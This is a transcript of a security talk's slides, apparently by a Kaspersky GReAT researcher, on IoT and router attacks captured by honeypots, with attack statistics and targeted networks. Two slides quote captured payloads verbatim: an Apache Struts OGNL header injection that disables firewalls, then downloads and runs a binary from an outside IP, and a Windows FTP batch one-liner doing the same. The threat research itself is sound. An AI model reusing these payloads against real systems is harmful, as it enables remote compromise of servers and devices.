The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat...
Transcript of The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat...
![Page 1: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/1.jpg)
"The supreme art of war is to subdue the enemywithout �ghting"
-- Sun Tzu
![Page 2: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/2.jpg)
![Page 3: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/3.jpg)
/whoamiMEng from Imperial College London in 2014Security Researcher @ Kaspersky LabMaster procrastinator
![Page 4: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/4.jpg)
/whoamiLarge scale DDoS attacks... their economybreak things... put them back together
![Page 5: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/5.jpg)
GReAT - Elite Threat ResearchGlobal Research and Analysis TeamFounded 2008Threat intelligence, research and innovationleadershipAPTs, critical infrastructure threats, bankingthreats, targeted attacks, �nding zero-days inpopular OS’es and products
![Page 6: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/6.jpg)
![Page 7: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/7.jpg)
The Great Worm
![Page 8: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/8.jpg)
![Page 9: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/9.jpg)
Nowadays... is there a di�erence?
![Page 10: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/10.jpg)
Credits: https://twitter.com/AgentSoft
![Page 11: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/11.jpg)
![Page 12: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/12.jpg)
![Page 13: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/13.jpg)
![Page 14: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/14.jpg)
![Page 15: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/15.jpg)
![Page 16: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/16.jpg)
![Page 17: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/17.jpg)
The problem
![Page 18: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/18.jpg)
The uglyUser: 666666 / Pass: 666666
![Page 19: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/19.jpg)
![Page 20: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/20.jpg)
The badTheir approachAttackers are pragmaticWill go for easier wins, whenever possible
![Page 21: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/21.jpg)
The bad170M IoT devices in major US cities
![Page 22: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/22.jpg)
The bad
![Page 23: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/23.jpg)
![Page 24: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/24.jpg)
The bad
![Page 25: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/25.jpg)
The goodOur approach
RDS & RCS, RO- AS8708Telekom, RO - AS9050Itelecom, RO - AS50244UPC, RO - AS6830BSKYB-BROADBAND-AS, GB - AS5607
![Page 26: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/26.jpg)
Honeypot Unique IPs: 327Honeypot Total hits: 14M
![Page 27: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/27.jpg)
Our hitsBruteforce attacks - passwords (2011)/rom-0 (2015)Shellshock (2015)Apache Strut attack (2017)D-Link DIR8xx vulnerability (2017)
![Page 28: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/28.jpg)
Attacks behaviourRomPager exploit => change the DNS serversShellshock => execute commandsApache Strut exploit => execute commandsD-Link DIR8xx vuln => 0wn the device
![Page 29: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/29.jpg)
RomPager exploit
![Page 30: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/30.jpg)
![Page 31: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/31.jpg)
![Page 32: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/32.jpg)
![Page 33: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/33.jpg)
![Page 34: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/34.jpg)
![Page 35: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/35.jpg)
![Page 36: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/36.jpg)
![Page 37: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/37.jpg)
![Page 38: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/38.jpg)
![Page 39: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/39.jpg)
![Page 40: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/40.jpg)
![Page 41: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/41.jpg)
Apache StrutsCisco, 8th of MarchFirst honeypot hits: 9th of MarchTotal hits in March: 10k
![Page 42: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/42.jpg)
==> "Content-Type" header <==
"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))). (#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://180.100.235.26:9/6;chmod 777 6;./6;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).((#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros
![Page 43: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/43.jpg)
(#cmd=' /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://180.100.235.26:9/6; chmod 777 6; ./6; '). (#iswin=(@java.lang.System@getProperty('os.name'). toLowerCase(). contains('win'))). (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). [...]
![Page 44: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/44.jpg)
![Page 45: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/45.jpg)
![Page 46: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/46.jpg)
![Page 47: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/47.jpg)
![Page 48: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/48.jpg)
Fancy some FTP commands?cmd.exe /c echo Open 180.100.235.26 21>C:\\Ftp.txtecho qwqw881688>>C:\\Ftp.txt echo qwqw881688>>C:\\Ftp.txt echo Binary>>C:\\Ftp.txt echo Get Microsof.exe C:\\setup.exe>>C:\\Ftp.txt echo Bye>>C:\\Ftp.txt echo Ftp.exe -s:C:\\Ftp.txt>C:\\Ftp.bat echo C:\\setup.exe>>C:\\Ftp.bat echo del C:\\Ftp.txt>>C:\\Ftp.bat echo del C:\\Ftp.bat>>C:\\Ftp.bat C:\\Ftp.bat
![Page 49: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/49.jpg)
Targets
![Page 50: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/50.jpg)
Most probed networksIPs ASN Name926832 KIXS-AS-KR Korea Telecom, KR399831 CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN344204 CHINANET-BACKBONE No.31,Jin-rong Street, CN333688 CHINA169-BACKBONE CNCGROUP China169 Backbone, CN182626 HINET Data Communication Business Group, TW122263 BSNL-NIB National Internet Backbone, IN119692 CHINA169-BJ China Unicom Beijing Province Network, CN101609 CNIX-AP China Networks Inter-Exchange, CN82500 VNPT-AS-VN VNPT Corp, VN72328 CMNET-GD Guangdong Mobile Communication Co.Ltd., CN64798 CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN64297 ERX-CERNET-BKB China Education and Research Network Center, CN55593 CTTNET China TieTong Telecommunications Corporation, CN48369 SKB-AS SK Broadband Co Ltd, KR47168 OCN NTT Communications Corporation, JP
![Page 51: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/51.jpg)
Most probed countries1929614 CN1092938 KR362662 US340174 JP279148 TW251536 IN164631 AU152775 HK144635 VN103334 DE72973 GB64254 ID
![Page 52: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/52.jpg)
What about now?
![Page 53: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/53.jpg)
The curious case of D-Linkrouters
12th of Sept 2017, Embedi
Unauthenticated retrieval of con�gs
Hits in honeypots: 20th of September
![Page 54: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/54.jpg)
Congratz, D-Link
![Page 55: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/55.jpg)
The misterious case of one IRCbotnet
![Page 56: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/56.jpg)
![Page 57: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/57.jpg)
![Page 58: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/58.jpg)
![Page 59: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/59.jpg)
![Page 60: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/60.jpg)
![Page 61: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/61.jpg)
Hunting for hunters
Elastic Search + Kibana
![Page 62: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/62.jpg)
Hunting for huntersInteractive honeypots
PythonGoLang
Tailored responses
![Page 63: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/63.jpg)
Hunting for huntersWhere your leaked passwords end up: Pastebin ™
GReAT KLara
![Page 64: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/64.jpg)
GReAT KLara
![Page 65: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/65.jpg)
ConclusionsIPv6
New exploits in the wild
Hey, this is interesting! => Let's get in touch
![Page 66: The supreme art of war is to subdue the enemy without ghting ... 2_dan...GReAT - Elite Threat Research Global Research and Analysis Team Founded 2008 Threat intelligence, research](https://reader034.fdocuments.us/reader034/viewer/2022051908/5ffb562a8456545ab01aa497/html5/thumbnails/66.jpg)
Dan Demeter@_xdanx
Global Research and Analysis Team